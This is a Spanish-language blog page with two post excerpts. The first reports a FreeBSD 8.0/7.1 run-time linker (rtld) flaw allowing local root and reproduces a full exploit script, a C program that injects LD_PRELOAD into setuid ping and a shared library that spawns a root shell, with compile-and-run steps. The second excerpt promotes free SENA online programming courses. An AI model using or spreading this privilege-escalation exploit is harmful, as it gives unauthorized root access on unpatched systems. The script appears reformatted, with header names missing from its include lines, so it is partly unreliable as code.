Fallo en FreeBSD permite obtener root

Acaba de hacerse publica una vulnerabilidad descubierta por Nikolaos Rangos en los sistemas FreeBSD que permite escalar privilegios y obtener permisos de root en las versiones 8.0 y 7.1 de este sistema operativo. El error reside en el Run-Time-Link Editor (rtld), que normalmente no permite variables de entorno peligrosas como LD_PRELOAD pero con una técnica sencilla el rtld pueden ser engañado para que acepte variables LD, incluso en los binarios setugid. VERSIONES DE FREEBSD AFECTADAS ********************************** FreeBSD 8.0-RELEASE *** VULNERABLE FreeBSD 7.1-RELEASE *** VULNERABLE FreeBSD 6.3-RELEASE *** NO VULNERABLE FreeBSD 4.9-RELEASE *** NO VULNERABLE Para más detalles ver el exploit. #!/bin/sh echo ** FreeBSD local r00t zeroday echo by Kingcope echo November 2009 cat > env.c << _EOF #include main() { extern char **environ; environ = (char**)malloc(8096); environ[0] = (char*)malloc(1024); environ[1] = (char*)malloc(1024); strcpy(environ[1], "LD_PRELOAD=/tmp/w00t.so.1.0"); execl("/sbin/ping", "ping", 0); } _EOF gcc env.c -o env cat > program.c << _EOF #include #include #include #include void _init() { extern char **environ; environ=NULL; system("echo ALEX-ALEX;/bin/sh"); } _EOF Para compilar y ejecutar gcc -o program.o -c program.c -fPIC gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles cp w00t.so.1.0 /tmp/w00t.so.1.0 ./env Mas Información en el Full Disclosure publicado por Nikolaos...

Leer Más

cursos de programacion gratuitos en el sena virtual

cursos de programacion hay muchos, pero ninguno como los cursos de programacion gratuitos que hace el sena virtual. El SENA (Servicio Nacional de Aprendizaje), en su página www.senavirtual.edu.co o en su plataforma sena sofia plus está implementando nuevos cursos programacion virtuales, entre las temáticas de estos cursos de programacion encontramos lenguajes como JAVA, C++, modelado de datos y calidad de software. Recordemos que al terminar los cursos de programacion en el sena virtual te dan un certificado del sena y entras automáticamente en la bolsa de empleo del SENA donde podrás ser llamado para trabajar en prestigiosas empresas del sector tecnológico del país. El listado de cursos de programacion que puedes realizar en el senavirtual es el siguiente:   Cursos de Programacion – Programación Orientada A Objetos Variables y estructuras de Control en la Programación orientada a objetos: Java Desarrollo de aplicaciones con Interfaz Gráfica, Manejo de Eventos, Clases y Objetos : Java Desarrollo de Aplicaciones con Manejo de Datos en la Memoria- Java Desarrollo de Aplicaciones con Manejo de Archivos de Texto y el Manejo de Excepciones en JAVA Desarrollo de Aplicaciones con Manejo de Proceso Simultaneo y Uso de Menús: Java Desarrollo de Applets/Aplicaciones con Uso de Base de Datos, Redes, Servlets y Multimedia Estructura del Lenguaje de Programación c++ ( Nivel I del cursos de programacion) Módulos, estructura de almacenamiento y POO utilizando el lenguaje de programación C++ ( Nivel II) Uso de clases, objetos, métodos y archivos secuenciales en POO con lenguaje de programación C++ ( Nivel III) cursos de programacion – Modelado De Datos Informática: Administración de bases de datos utilizando Microsoft® Access 2000 Informática: Diseño de bases de datos en SQL Metodología de la Programación de Sistemas Informáticos Estructuras de datos Lineales Estructuras de datos No Lineales Modelación de Sistemas – Modelación Modelación de Sistemas – Simulación Base de datos: Conceptuación y sistemas de Administración Diseño de Casos de Uso Metodologías de Análisis y Diseño de Sistemas-de la incepción al diseño de la arquitectura Metodologías de Análisis y Diseño de Sistemas-del diseño a la implementación Principios del análisis y diseño orientado a objetos, utilizando el estándar UML Aplicación metodología orientada a objetos utilizando el estándar UML Para acceder a estos cursos de programacion gratuitos del SENA solo tienes que entrar al enlace de los cursos de programacion en el sena...

Leer Más

Siguenos!

O Puedes Subscribete

ANTES DE

SALIRTE ...

NO TE

ARREPENTIRÁS

!Gracias¡

NO OLVIDES NUESTRAS REDES SOCIALES